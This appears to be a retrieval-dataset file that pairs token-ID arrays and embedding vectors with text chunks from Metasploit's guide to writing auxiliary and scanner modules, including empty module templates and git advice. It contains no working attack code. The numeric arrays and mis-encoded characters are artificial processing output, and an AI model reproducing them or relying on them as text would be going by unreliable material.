2008, 19933, 1010, 5452, 1010, 2030, 17708, 2242, 2006, 4539, 3698, 1012, 17908, 8545, 3322, 2580, 2023, 19622, 2005, 20786, 1011, 15729, 14184, 2008, 5478, 4106, 2051, 1012, 7396, 8545, 3322, 2580, 2023, 19622, 2005, 2019, 15488, 25856, 11336, 2005, 2591, 1011, 3330, 5682, 1012, 9998, 28139, 15353, 2969, 1011, 4654, 24759, 5162, 7062, 1024, 14920, 1011, 1997, 1011, 2326, 14184, 1012, 11865, 13213, 2545, 10128, 2115, 11336, 2003, 1037, 11865, 13213, 2121, 1010 ]
metasploit
112.txt
0
this is where it belongs. make sure to place it in the correct sub - directory based on the protocol. gathermodules that gather, collect, or enumerates data from a single target. scannermodules that use the msf : : auxiliary : : scanner mixin almost always go here. make sure to place yours in the correct sub - directory based on the protocol. servermodules that are servers. sniffermodules that are sniffers. there are actually a few more directories in auxiliary, but that ’ s kind of where the gray area is. you are more than welcome to see if yourself. the msf : : auxiliary : : scanner mixinthe msf : : auxiliary : : scanner mixin is heavily used in auxiliary modules, so we might as well talk about it right here. the mixin allows you to be able to test against a range of hosts, and it ’ s multi - threaded. to use it, first off you need to include the mixin under the scope of your metasploit3 class : include msf : : auxiliary : : scanner a couple of new things will be added to your module when you include this mixin. you will have a new datastore option named β€œ rhosts ”, which allows the user to specify multiple hosts. there ’ s a new β€œ threads ” option, which allows the number of threads to run during execution. there ’ s also β€œ showprogress ” and β€œ showprogresspercent ” for tracking scan progress. typically, the main method for an auxiliary module is β€œ def run ”. but when you use the msf : : auxiliary : : scanenr mixin, you need to be using def run _ host ( ip ). the ip parameter is the target machine. templateshere ’ s the most basic example of an auxiliary module. we ’ ll explain a bit more about the fields that need to be filled : # # # this module requires metasploit : url # current source : url # # class metasploitmodule < msf : : auxiliary def initialize ( info = { } ) super ( update _ info ( info,'name'= >'module name ','description'= > % q { say something that the user might want to know. },'author'= > ['name'],'license'= > msf _ license ) ) end def run # main function end end
[ 0.4353525936603546, -0.4614783525466919, 0.21606385707855225, 0.5328788757324219, -0.10620696097612381, 0.21630752086639404, -0.4126136302947998, 0.17343513667583466, 0.014177785255014896, 0.9105561375617981, -0.048386652022600174, -0.31207752227783203, 0.09666676819324493, -0.10096579790115356, -0.521746039390564, -0.03572060912847519, -0.34602880477905273, -0.08246666938066483, -0.9428170323371887, -0.12469488382339478, 0.4912688434123993, -0.18897542357444763, -0.9887389540672302, -0.7156903743743896, -0.29663795232772827, 0.5257828235626221, 0.6858702301979065, 0.39080196619033813, 0.6988739371299744, 0.8308337926864624, 0.16778013110160828, -0.05202470347285271, -0.13671021163463593, -0.992790162563324, 0.26353418827056885, -0.47587552666664124, 0.8435214161872864, 0.10301288217306137, -0.10435105860233307, -0.6913703680038452, 0.11597098410129547, -0.3568402826786041, 0.29098859429359436, -0.4946242570877075, -0.6148587465286255, -0.4587683081626892, -0.022413387894630432, -0.21364733576774597, 0.4721119701862335, -0.23326292634010315, 0.5016573071479797, 0.4442555606365204, 0.11498145759105682, 0.7069517970085144, 0.07509074360132217, 0.389837384223938, -0.5605790019035339, 0.430752694606781, -0.526064932346344, 0.42445868253707886, 0.1756969690322876, 0.12754687666893005, -0.14971046149730682, -0.9658662676811218, 0.09289434552192688, 0.49293220043182373, 0.359869122505188, -0.41538190841674805, -0.28327903151512146, -1.0879056453704834, 0.28472352027893066, 0.4972851276397705, -0.795741856098175, -0.07491220533847809, -0.15074096620082855, 0.32232576608657837, 0.6770814061164856, -0.13821373879909515, -0.26719969511032104, 1.1781749725341797, 0.1748824417591095, 0.7579289674758911, 0.6039794087409973, -0.21878162026405334, -0.1418936550617218, -0.6205927133560181, 0.7299020290374756, 0.34333336353302, -0.40028905868530273, 0.13103923201560974, 0.0777050107717514, 0.3380347490310669, -0.22078034281730652, -0.1954454779624939, -0.2579174339771271, 0.41320663690567017, -0.09868757426738739, 0.185536727309227, 0.6825105547904968, -0.36847761273384094, 0.7552399635314941, 0.7617142200469971, 0.38910457491874695, 0.011147387325763702, -0.34056541323661804, 0.47672900557518005, 0.12294379621744156, -0.2653965950012207, -0.07905153185129166, -0.42950794100761414, 0.24046701192855835, -0.14056545495986938, -0.06057807803153992, -0.6915011405944824, -0.11810720711946487, 0.27364248037338257, 0.4510389566421509, 0.1464332789182663, -0.5976153016090393, 0.5585501790046692, -0.75059574842453, -0.5426574945449829, 0.634070098400116, -0.5590587258338928, 0.3042229413986206, -0.21159468591213226, -0.1891891211271286, 0.6947919726371765, -0.4655965566635132, -0.6262651681900024, -0.07796045392751694, -0.011312481015920639, -0.24555107951164246, 0.24460949003696442, 0.2844887375831604, -0.006898039951920509, 0.024785693734884262, 0.4061390161514282, 1.0468077659606934, -0.8890171647071838, 0.21110907196998596, 0.12344472110271454, 0.8461965918540955, 1.313471794128418, 0.6586122512817383, -0.4022323787212372, 0.15283140540122986, -0.07789907604455948, -0.1679072082042694, 0.11672753095626831, -0.05266955494880676, -0.12149358540773392, 0.3800974488258362, -0.5855112075805664, -1.0167557001113892, 0.6476432085037231, -0.7418251037597656, 0.28813010454177856, -0.21447943150997162, 0.2978873550891876, -0.5242884755134583, 0.7878841161727905, 0.36691758036613464, 0.40465429425239563, -0.06363381445407867, 0.4825730621814728, -1.0616942644119263, -0.3688434362411499, -0.35638758540153503, -0.05514022707939148, -0.028211809694767, -0.6886422038078308, -0.6571184992790222, 0.550693929195404, 1.510310173034668, 0.7802541851997375, -0.5450680255889893, 0.30890342593193054, 0.024927396327257156, 0.3649398982524872, -0.7826030254364014, 0.18851567804813385, 0.5762182474136353, 0.36807572841644287, 0.08598928898572922, 0.43384480476379395, -0.18669241666793823, -0.4886282980442047, -0.24005328118801117, -0.7698023915290833, -0.09277212619781494, 0.5408197045326233, -0.3090599775314331, 0.5680049657821655, 0.7269851565361023, -0.12442698329687119, -1.394569993019104, 0.2689191997051239, 0.008493304252624512, -1.4684356451034546, -0.6537686586380005, -0.007994008250534534, -0.09432674199342728, 0.7667628526687622, -0.3741450607776642, -0.11098747700452805, 1.0210847854614258, 0.8077038526535034, -0.9009701013565063, 0.46771344542503357, 1.1695611476898193, -0.1201571598649025, -0.40255916118621826, 0.22687940299510956, -0.30418896675109863, -0.001325795310549438, -0.47558510303497314, 0.2575468122959137, -0.4108639657497406, 0.1572982370853424, -0.07706648111343384, 0.9367268681526184, 0.22959855198860168, -0.04223206266760826, 0.19729392230510712, -0.3127846419811249, -0.0022129735443741083, 0.30568382143974304, -0.10251191258430481, 0.21456395089626312, -0.3153344690799713, 0.7282668352127075, 0.1712157428264618, 0.9489467740058899, -0.12039993703365326, -0.40056881308555603, 0.5099733471870422, 0.43632885813713074, -0.6464868187904358, 0.136616051197052, 0.297372430562973, 1.0380041599273682, 0.6462464928627014, 0.2063203603029251, 0.7977926135063171, 0.3483794629573822, 0.3506406545639038, -0.17532756924629211, -0.11674222350120544, 0.5778207182884216, -0.3349721431732178, 0.5826061367988586, 0.8190625309944153, 0.21346628665924072, 0.1604917198419571, -0.8676059246063232, 0.004663723986595869, 1.355721116065979, -0.7686814665794373, -1.4228286743164062, -0.41741445660591125, -0.5436528921127319, -0.8280677199363708, -0.48260968923568726, 0.3193061351776123, 0.4929232895374298, -0.309932678937912, -0.014487572014331818, 0.09877661615610123, -0.1851285845041275, -0.8103166222572327, 0.08300549536943436, -0.742030143737793, -0.5113580226898193, -0.9348173141479492, 0.354301393032074, 0.41344907879829407, -0.13245989382266998, 0.36256545782089233, -0.6229525804519653, -0.6659457683563232, 0.6332732439041138, 0.20763209462165833, 0.9817066192626953, 0.0725356712937355, -0.7810229659080505, -0.8693912029266357, 0.22712746262550354, -0.04688170924782753, 0.9899935722351074, -0.49116775393486023, -0.3266180455684662, -0.6087113618850708, -0.029996957629919052, 0.17628630995750427, 0.04574842378497124, 0.9527060985565186, 0.22095726430416107, -0.1701226383447647, -0.20352230966091156, -0.1915469616651535, -0.06138475611805916, 0.8193808794021606, -0.08764385432004929, 0.06939437985420227, 0.7944636344909668, -0.06658270955085754, -0.5140130519866943, 0.348163902759552, 0.6520191431045532, -0.7663105130195618, 0.704156219959259, -0.3924906849861145, 1.1197762489318848, -0.5409038662910461, 0.6762803196907043, 0.2413756400346756, -0.04900660738348961, 0.24896110594272614, -0.24224615097045898, 0.3286304771900177, -0.34613656997680664, -0.035603828728199005, -0.4538571834564209, 0.06445980817079544, 0.3903031349182129, 0.250877320766449, -1.0330358743667603, 0.7874447703361511, -0.33500775694847107, -0.1530173271894455, -0.20189519226551056, -0.2353561967611313, 1.062843680381775, -0.3504577577114105, -0.14605742692947388, -0.5152251720428467, -0.28107261657714844, 0.1572391837835312, 0.2725909650325775, -0.0660112053155899, -0.8330311179161072, 0.44655197858810425, 0.32316964864730835, -0.03849304839968681, 0.8007448315620422, 0.33113589882850647, -0.6048201322555542, -0.10445569455623627, -0.24340853095054626, -0.06070753559470177, 0.22666358947753906, 0.4067995548248291, 1.1723767518997192, 0.13241100311279297, 0.73368239402771, -0.740845263004303, 0.07786539196968079, 0.38161036372184753, 0.3837437629699707, 0.12704265117645264, 0.13188332319259644, -0.044365812093019485, 0.48340633511543274, -0.8634412884712219, -0.8568137884140015, 0.5338192582130432, 0.24610130488872528, 0.3586273491382599, -0.4097968637943268, 0.4875517785549164, -0.616761326789856, 0.2271580845117569, 0.31422215700149536, -0.40951070189476013, -0.9299102425575256, -0.05565683916211128, 0.2728540897369385, 0.6890552639961243, -0.9422217607498169, 0.20199504494667053, -0.457431823015213, -0.19102182984352112, 0.25116226077079773, -0.005069003906100988, 0.20786306262016296, -1.025454044342041, -0.40476155281066895, 0.23038211464881897, -0.4067288935184479, 0.08949335664510727, -0.4457791745662689, 0.5168313384056091, -0.37019798159599304, -0.552561342716217, -0.9908843040466309, 0.6862604022026062, 0.9730871319770813, 0.8605862855911255, 0.40517106652259827, 0.47540926933288574, -0.06334548443555832, -0.3617095649242401, 0.20710045099258423, -0.2743687629699707, 0.3884567618370056, -0.3289269506931305, 0.8010208010673523, 0.019008222967386246, 0.18677690625190735, -0.09775494784116745, -0.1878911703824997, -0.18721351027488708, 0.2114168256521225, -0.5327235460281372, 0.11697785556316376, -0.4238828718662262, -0.5003867149353027, 0.07864853739738464, -0.4735856056213379, -0.5806002020835876, 0.06414373964071274, -0.7667997479438782, 0.5201025009155273, 0.7752560973167419, -0.9827860593795776, -0.3010369539260864, -0.43436574935913086, 0.16969403624534607, 0.5346721410751343, -0.20981916785240173, -0.5407390594482422, -0.6612226963043213, -0.5700023770332336, -0.7466098070144653, 0.3338721990585327, 0.5979014039039612, -0.46981725096702576, 0.3604212701320648, -0.7662004828453064, -0.1760406643152237, 0.09982121735811234, -0.30900153517723083, -0.9017573595046997, -0.0887376144528389, 0.5756507515907288, 0.5900967121124268, 0.5791524052619934, -0.6340121030807495, -0.7008519768714905, 0.21004018187522888, -1.0472445487976074, 0.31259825825691223, -1.1689372062683105, 0.2949067950248718, 0.5052971839904785, -0.020665135234594345, -0.4233691990375519, 0.4658919870853424, -0.8569898009300232, 0.233305886387825, -0.1909184753894806, 0.43136560916900635, -0.9037861824035645, -0.46843576431274414, 0.6203882694244385, -0.07876907289028168, -0.4715522527694702, 0.2960817217826843, 0.12425559014081955, -0.573722243309021, 0.5827173590660095, 0.1807354837656021, -0.4855321943759918, 0.26284658908843994, -0.6450322866439819, 0.8020095229148865, 0.282107412815094, -0.04027227684855461, -0.10014737397432327, -0.5114869475364685, 1.0259917974472046, -0.07263215631246567, 0.536231279373169, -0.5433937907218933, -0.8935083746910095, 0.03392265364527702, 0.36795562505722046, 0.18279661238193512, 0.44415751099586487, -0.11669130623340607, 0.17463679611682892, -0.4180520474910736, 0.1682596206665039, -0.6857544183731079, -0.7599966526031494, -0.037147343158721924, -0.44901174306869507, 0.2516852915287018, 0.16504043340682983, 0.5608201622962952, -0.256330668926239, 0.13255013525485992, 0.30910736322402954, -0.20054654777050018, -0.5591173768043518, -0.7437509298324585, 0.11581773310899734, -0.695042610168457, -0.05087032541632652, 0.3402063846588135, -0.17854717373847961, 0.21031734347343445, 0.1815679967403412, 0.2443179339170456, 0.6819881796836853, 0.8795337677001953, -0.06273496896028519, -0.051412761211395264, 0.6278285980224609, 0.12355338037014008, -0.884745717048645, 0.15983767807483673, 0.45504051446914673, -0.3262127637863159, -0.41172555088996887, 0.2275339663028717, -0.36709609627723694, -1.107594609260559, -1.0780199766159058, -0.30088475346565247, 0.09942872822284698, 0.049777157604694366, -0.11758828163146973, -0.6755995750427246, -0.3072409927845001, 0.5154432654380798, 0.4761912226676941, -1.0951135158538818, -0.0908190980553627, -0.2838990390300751, 0.9460611939430237, -0.03738943859934807, 0.07511314004659653, -0.6133713722229004, -0.6898502111434937, -0.930047869682312, 0.5172597169876099, -0.9515407681465149, -0.5795736908912659, -0.2096753716468811, 0.29487231373786926, 0.44329991936683655, 0.1823110729455948, -0.7730230093002319, -1.0434156656265259, -0.3545212149620056, 0.2696656286716461, -0.3351742923259735, 0.7179527878761292, -0.43132489919662476, 0.3214610517024994, 0.5905551314353943, -0.13017110526561737, 0.08880071341991425, -0.9690359830856323, -0.702477753162384, -0.023170925676822662, 0.6544908285140991, -0.28873151540756226, -0.04649699106812477, -0.22009506821632385, 1.029545783996582, 0.5103365778923035, -0.4911746680736542, -0.5198783278465271, 0.10865391790866852, -0.4689657688140869, -1.2030664682388306, 0.813848614692688, -0.3781900107860565, -0.11394225805997849, 0.1807018220424652, -0.1616784632205963, 0.6011795997619629, -0.565290629863739, 0.0638643428683281, 1.0927846431732178, 0.30373409390449524, 0.43658939003944397, -0.848827064037323, 0.2688833773136139, 0.4335821866989136, -0.3272773027420044, 0.3512517809867859, 0.04539904370903969, -0.4794055223464966, -0.011494271457195282, -0.33093738555908203, -0.7104548215866089, -0.5985191464424133, -0.593706488609314, 0.1958310902118683, -0.09527215361595154, 0.549656867980957, -0.5368397831916809, -0.40303656458854675, 0.07703607529401779, 0.25730085372924805, 0.4254310131072998, 0.12299393862485886, 0.593471109867096, 0.4659857749938965, -0.05766071379184723, -0.5667752027511597, 0.1865989863872528, 0.05176807567477226, -0.07066135108470917, 0.8383709192276001, 0.4609531760215759, -0.6706345677375793, 0.7845996618270874, 0.3044000267982483, -1.0153762102127075, -0.7519828081130981, -0.7769252061843872, -0.16770893335342407, -0.022030789405107498, -0.25142309069633484, -0.1852729171514511, 0.46839603781700134, -0.05123628303408623, 0.565376877784729, 0.9352101683616638, 0.32085293531417847, -0.09610723704099655, -0.7473693490028381, 0.04927842319011688, -0.012040896341204643, 0.26118606328964233, 0.28720158338546753, -0.44770708680152893, -0.5627376437187195, -1.1002932786941528, -0.38130703568458557, 0.6381707191467285, -0.01604273170232773, 0.79612135887146, -0.09901005029678345, 0.5435627102851868, 0.2565976083278656, 0.6721953749656677, 1.2176812887191772, 0.42221349477767944, 0.14232441782951355, 0.9226998686790466, 0.17895609140396118, -1.0301969051361084, -0.3010554015636444, 0.4614759087562561, 0.0027149703819304705, 0.1405068337917328, -0.13449114561080933, -0.4136601686477661, -0.2459106743335724, 0.02965354174375534, 0.04933313652873039, -1.3663451671600342, -0.9009867310523987, -1.0252470970153809, 0.05021063610911369, 0.14915384352207184, -0.04945998638868332, 0.406026691198349, 0.0278012752532959, -0.3594379127025604, -0.25539642572402954, -0.8538808822631836, 0.17536240816116333, -0.07636106014251709, -0.382684588432312, -0.7711225748062134, 0.4492989480495453, -0.9208917021751404, -0.24535977840423584, 0.10591036826372147, -0.16439968347549438, -0.28105631470680237, -0.6627066731452942, -0.04919607564806938, 0.01750778965651989, -0.8631759881973267, 0.27793756127357483, -0.455573171377182, 0.31136372685432434, -0.1996934711933136, -0.8213735818862915, 0.16750507056713104, 0.7636916041374207, -0.7433228492736816, 0.5013392567634583, 0.4019344449043274, -0.046510547399520874, 0.7801253795623779, -1.1325898170471191, 0.22280605137348175, -0.21447089314460754, -0.29419663548469543, 0.33946549892425537, 0.6005746126174927, -0.3636679947376251, -0.21920646727085114, 0.010714701376855373, -0.9492502808570862, -0.36352983117103577, -0.49364331364631653, -0.2914636433124542, 0.39291566610336304, -0.16211257874965668, -0.3670157790184021, 1.0024405717849731, -0.34042075276374817, 0.14370988309383392, -0.6937671899795532, 0.6074026823043823, 0.4360424280166626, 0.21307958662509918, -0.4398235082626343, 0.06564674526453018, 0.1325206458568573, 0.15461865067481995, -0.13588309288024902, 0.2854745090007782, -0.780144453048706, 0.1844564974308014, 0.25300949811935425, 0.001617723610252142, -0.1416931003332138, -0.270101934671402, 0.2940322160720825, 0.19214129447937012, 0.6097998023033142, 0.4365309178829193, 0.38021039962768555, -0.47673842310905457, -0.7263503670692444, 0.1709185689687729, -1.0577316284179688, 0.03467407822608948, 0.33252301812171936, 0.030114445835351944, -0.33217957615852356, -0.12336570769548416, -0.6204435229301453, -0.17716003954410553, -0.0681895762681961, 0.1916661113500595, 0.5227621793746948, -0.09283097833395004, -0.012993311509490013, 1.0194811820983887, -0.41485628485679626, -0.7980570793151855, -0.37068241834640503, 0.2347356528043747, -0.9566147327423096, -1.229418158531189, -0.08413990586996078, 0.48896169662475586, -0.09111310541629791, 0.11015061289072037, -0.47832539677619934, 0.022299667820334435, 0.21599966287612915, 0.126503124833107, 0.5623927712440491, -0.0975601002573967, -0.3210574984550476, 0.6401082873344421, -0.2238239049911499, -0.07350654900074005, -0.20171985030174255, 0.08903622627258301, 0.46611711382865906, 0.3664119243621826, -0.6184647083282471, 0.2269822210073471, -0.07805698364973068, 0.07239300012588501, 0.9919302463531494, 0.3689455986022949, 0.7429103255271912, 0.19306206703186035, -0.10513503849506378, -0.7591725587844849, 0.4444339871406555, 0.16249534487724304, 0.6507481932640076, 0.4510270059108734, 0.6579663753509521, 0.6192559003829956, -0.6433258652687073, -0.42956799268722534, 0.25309184193611145, -0.24078233540058136, -0.15496301651000977, 0.00016360596055164933, -0.23035620152950287, -0.29715511202812195, 0.3679125905036926, -0.413322389125824, -0.0886603519320488, -0.08399398624897003, 0.19892296195030212, -0.4701559543609619, 0.05159726366400719, 1.3475055694580078, -0.093865305185318, 0.1643599271774292, 0.2055775374174118, -0.014808470383286476, 0.5056207776069641, -0.06380479782819748, -0.77534419298172, 0.058412306010723114, 0.9970911741256714, 0.1960155963897705, 0.030475525185465813, 0.3450383245944977, -0.22957105934619904, 0.587527871131897, 0.17153514921665192, -0.19293059408664703, -0.9687614440917969, 0.6872876882553101, 0.10710439085960388, -0.591083824634552, -0.32877886295318604, -0.22742204368114471, 0.4879164695739746, 0.13749971985816956, 0.5206465721130371, -0.34696468710899353, 0.2668014466762543, -0.9533680081367493, 1.4341901540756226, -0.7090020179748535, 0.9289461970329285, 0.09762683510780334, -0.252013623714447, -0.9800070524215698, 1.3844647407531738, 0.006938752718269825, 0.8148890733718872, 0.5322562456130981, 1.035136103630066, 0.8083704710006714, 0.5410592555999756, 0.2780887484550476, 0.20399095118045807, -0.2546197175979614, 0.25809958577156067, -0.13458718359470367, -0.2737092971801758, 0.039624642580747604, -0.6790467500686646, 0.972814679145813, -0.09677347540855408, -0.06412194669246674, -0.602096438407898, 0.49969717860221863, -0.6488444209098816, -0.2671663463115692, 0.5903756022453308, 0.37456291913986206, -1.038740873336792, 0.21399076282978058, 0.9185292720794678, 0.391167014837265, 0.33832111954689026, -0.6382450461387634, -0.48190218210220337, -0.33865827322006226, -0.276413232088089, -0.0777384340763092, 0.8276066780090332, -0.0564127080142498, -0.15374885499477386, -0.048243917524814606, -0.9259449243545532, -0.25407418608665466, -0.4910052418708801, -0.7806764245033264, -0.3076768219470978, 0.9235845804214478, 0.3883052170276642, 0.8129962682723999, 0.807123601436615, -0.3162267506122589, -0.2912546694278717, 0.17742888629436493, 0.6193146705627441, -0.2023058384656906, 0.8798013925552368, 0.4855065941810608, -0.1880357414484024, -0.006226217374205589, -0.4526665508747101, 0.30244871973991394, -0.37581756711006165, 0.4092975854873657, -0.0007162546389736235, 0.0002552745572756976, -0.71402907371521, -0.31659677624702454, 0.08157385140657425, 0.08299016207456589, 0.16331815719604492, -0.15170565247535706, -0.9808875322341919, -0.03415784239768982, -0.5037108063697815, -0.2044435441493988, -0.11588087677955627, 0.2578933835029602, -0.3339429497718811, 0.3723113536834717, -0.0896538496017456, -0.8665997982025146, 4.108919620513916, 0.37541723251342773, -0.32356804609298706, -0.0076557039283216, 0.5296195149421692, 1.0786521434783936, 0.8403735160827637, -0.652423083782196, 0.5070662498474121, -0.45195135474205017, 0.5018141269683838, -0.6391391754150391, 0.2649356722831726, 0.6464400291442871, 0.9416278600692749, 0.4827747941017151, -0.04790018871426582, 0.4811398983001709, 0.12848447263240814, -0.7896522879600525, -1.4969795942306519, 0.12704677879810333, -0.4754909574985504, 1.1017935276031494, 0.7167011499404907, 0.2543024718761444, 0.6733233332633972, -1.238311767578125, -0.3989003896713257, -0.350134015083313, 0.13282305002212524, -0.03061138652265072, 0.33453765511512756, -0.4444675147533417, -0.2617526054382324, -0.011495735496282578, 0.034608274698257446, -0.5511050820350647, -0.5015811920166016, -0.10981665551662445, 0.5666102766990662, -0.14226803183555603, 0.6865352988243103, -0.3976527750492096, 0.14988858997821808, 1.2260353565216064, -0.7563247680664062, 1.1052933931350708, 0.19560635089874268, -1.1585808992385864, 0.8348295092582703, 0.7028729319572449, 0.6296681761741638, 0.10407199710607529, -0.5217186808586121, 0.5822998285293579, 0.3120020925998688, -0.48347821831703186, -0.24811270833015442, -0.41549479961395264, 0.589677095413208, 0.12119706720113754, 0.15789400041103363, 0.24854616820812225, -0.628696620464325, 0.46394824981689453, -0.3055232763290405, -0.07344918698072433, 0.1291833519935608, 0.25850263237953186, -0.06571541726589203, 0.11821791529655457, -0.5909390449523926, -1.0728719234466553, 0.6454408764839172, 0.020516611635684967, -0.4670334458351135, -0.025248579680919647, 0.8208940625190735, -0.6135116219520569, -0.8292039036750793, -0.7865763306617737, -1.0695321559906006, 0.3289318382740021, 0.47305306792259216, 0.21447224915027618, -0.26376017928123474, -1.3338611125946045, 0.1180245652794838, -0.14922453463077545, 0.23394301533699036, 0.2502231001853943, -0.37110331654548645, -0.2686499059200287, 0.10856981575489044 ]
[ 2023, 2003, 2073, 2009, 7460, 1012, 2191, 2469, 2000, 2173, 2009, 1999, 1996, 6149, 4942, 1011, 14176, 2241, 2006, 1996, 8778, 1012, 8587, 5302, 8566, 4244, 2008, 8587, 1010, 8145, 1010, 2030, 4372, 17897, 20370, 2951, 2013, 1037, 2309, 4539, 1012, 26221, 5302, 8566, 4244, 2008, 2224, 1996, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 4666, 2378, 2471, 2467, 2175, 2182, 1012, 2191, 2469, 2000, 2173, 6737, 1999, 1996, 6149, 4942, 1011, 14176, 2241, 2006, 1996, 8778, 1012, 8241, 5302, 8566, 4244, 2008, 2024, 14903, 1012, 27907, 2121, 5302, 8566, 4244, 2008, 2024, 27907, 2545, 1012, 2045, 2024, 2941, 1037, 2261, 2062, 2472, 3111, 1999, 9830, 1010, 2021, 2008, 1521, 1055, 2785, 1997, 2073, 1996, 3897, 2181, 2003, 1012, 2017, 2024, 2062, 2084, 6160, 2000, 2156, 2065, 4426, 1012, 1996, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 4666, 18447, 5369, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 4666, 2378, 2003, 4600, 2109, 1999, 9830, 14184, 1010, 2061, 2057, 2453, 2004, 2092, 2831, 2055, 2009, 2157, 2182, 1012, 1996, 4666, 2378, 4473, 2017, 2000, 2022, 2583, 2000, 3231, 2114, 1037, 2846, 1997, 6184, 1010, 1998, 2009, 1521, 1055, 4800, 1011, 26583, 1012, 2000, 2224, 2009, 1010, 2034, 2125, 2017, 2342, 2000, 2421, 1996, 4666, 2378, 2104, 1996, 9531, 1997, 2115, 18804, 13102, 4135, 4183, 2509, 2465, 1024, 2421, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 1037, 3232, 1997, 2047, 2477, 2097, 2022, 2794, 2000, 2115, 11336, 2043, 2017, 2421, 2023, 4666, 2378, 1012, 2017, 2097, 2031, 1037, 2047, 2951, 23809, 2063, 5724, 2315, 1523, 1054, 15006, 3215, 1524, 1010, 2029, 4473, 1996, 5310, 2000, 20648, 3674, 6184, 1012, 2045, 1521, 1055, 1037, 2047, 1523, 16457, 1524, 5724, 1010, 2029, 4473, 1996, 2193, 1997, 16457, 2000, 2448, 2076, 7781, 1012, 2045, 1521, 1055, 2036, 1523, 2265, 21572, 17603, 4757, 1524, 1998, 1523, 2265, 21572, 17603, 4757, 4842, 13013, 1524, 2005, 9651, 13594, 5082, 1012, 4050, 1010, 1996, 2364, 4118, 2005, 2019, 9830, 11336, 2003, 1523, 13366, 2448, 1524, 1012, 2021, 2043, 2017, 2224, 1996, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 13594, 2368, 2099, 4666, 2378, 1010, 2017, 2342, 2000, 2022, 2478, 13366, 2448, 1035, 3677, 1006, 12997, 1007, 1012, 1996, 12997, 16381, 2003, 1996, 4539, 3698, 1012, 23561, 19603, 2063, 1521, 1055, 1996, 2087, 3937, 2742, 1997, 2019, 9830, 11336, 1012, 2057, 1521, 2222, 4863, 1037, 2978, 2062, 2055, 1996, 4249, 2008, 2342, 2000, 2022, 3561, 1024, 1001, 1001, 1001, 2023, 11336, 5942, 18804, 13102, 4135, 4183, 1024, 24471, 2140, 1001, 2783, 3120, 1024, 24471, 2140, 1001, 1001, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 9830, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 11336, 2171, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2360, 2242, 2008, 1996, 5310, 2453, 2215, 2000, 2113, 1012, 1065, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 2171, 1005, 1033, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1007, 1007, 2203, 13366, 2448, 1001, 2364, 3853, 2203, 2203 ]
metasploit
112.txt
1
the name field can begin with the vendor name, but optional. followed by the software name. and then a few words that basically describe what it ’ s for. for example : β€œ dolibarr erp / crm login utility ” the description field should explain what the module does, things to watch out for, specific requirements, the more the better. the goal is to let the user understand what he ’ s using without the need to actually read the module ’ s source and figure things out. and trust me, most of them don ’ t. the author field is where you put your name. the format should be β€œ name β€œ. if you want to have your twitter handle there, leave it as a comment, for example : β€œ name # handle ” because the msf : : auxiliary : : scanner mixin is so popular, we figured you want a template for it, too. and here you go : # # # this module requires metasploit : url # current source : url # # class metasploitmodule < msf : : auxiliary include msf : : auxiliary : : scanner def initialize ( info = { } ) super ( update _ info ( info,'name'= >'module name ','description'= > % q { say something that the user might want to know. },'author'= > ['name'],'license'= > msf _ license ) ) end def run _ host ( ip ) # main method end end basic git commandsmetasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git go a long way. we ’ re not here to lecture you about how awesome git is, we know it has a learning curve and it ’ s not surprising to find new users making mistakes. every once a while, your git β€œ rage ” will kick in, and we understand. however, it ’ s important for you to take advantage of branching. every time you make a module, or make some changes to existing code, you should not do so on the default master branch. why? because when you do a msfupdate, which is metasploit ’ s utility for updating your repository, it will do a git reset before merging the changes, and all your code go bye - bye. another mistake people tend to do is have all the changes on master before submitting a pull request.
[ 0.40161406993865967, -0.6018102169036865, 0.19133882224559784, 0.25896719098091125, -0.6417853236198425, -0.5760394334793091, 0.126174196600914, -0.0890897661447525, 0.256975919008255, 0.9067630171775818, 0.10422760248184204, -0.1990775167942047, 0.4553883373737335, -0.06920457631349564, -0.3173399567604065, 0.2379172295331955, -0.07705966383218765, -0.2730254530906677, -1.2974779605865479, 0.0005784332170151174, 0.5965030789375305, 0.16714301705360413, -1.0709258317947388, -0.4763062000274658, -0.22226105630397797, 0.5230640769004822, 0.46351349353790283, 0.154352068901062, 0.8451961278915405, 0.6394631862640381, 0.2556450068950653, -0.3069537878036499, 0.05322214961051941, -0.3112514019012451, -0.02135770581662655, -0.11528542637825012, 0.5719179511070251, -0.2398555725812912, -0.18888325989246368, -0.11951007694005966, 0.2272859513759613, -0.7467165589332581, 0.5110655426979065, -0.855992317199707, -1.2374646663665771, -0.017375530675053596, 0.3766489028930664, -0.4386542737483978, 0.4565812349319458, -0.8845121264457703, 0.31760039925575256, 0.4356984794139862, 0.5615930557250977, 0.3918384611606598, 0.17977863550186157, 0.08759083598852158, -0.23044097423553467, 0.11243581026792526, -0.28081387281417847, 0.044414788484573364, -0.2058054655790329, 0.6991672515869141, -0.029586592689156532, -1.011113166809082, 0.3294532299041748, 0.3089306950569153, 0.07111476361751556, 0.07185518741607666, 0.07599315047264099, -0.241555318236351, 0.13043510913848877, 0.20318470895290375, -0.566595733165741, -0.4198022782802582, -0.4536847174167633, -0.5631807446479797, 0.9377940893173218, -0.05791677534580231, -0.099677674472332, 0.6283499598503113, -0.12382107228040695, 0.6031752824783325, 0.2090815007686615, -0.09104900062084198, -0.5137262940406799, -0.23872517049312592, 0.5781249403953552, 0.6096149682998657, -0.25534725189208984, -0.1530390977859497, 0.7768613696098328, 0.30372539162635803, -0.17202934622764587, -0.48075181245803833, 0.3512117266654968, 0.5587598085403442, -0.38957810401916504, 0.16727377474308014, 0.33958879113197327, -0.025378456339240074, 1.2687578201293945, 0.6842190027236938, 0.6514635682106018, 0.421733558177948, 0.04154413193464279, 0.46605274081230164, 0.14599354565143585, -0.5560274720191956, -0.022460613399744034, -0.20674583315849304, 0.4574090540409088, -0.08177198469638824, -0.13215231895446777, 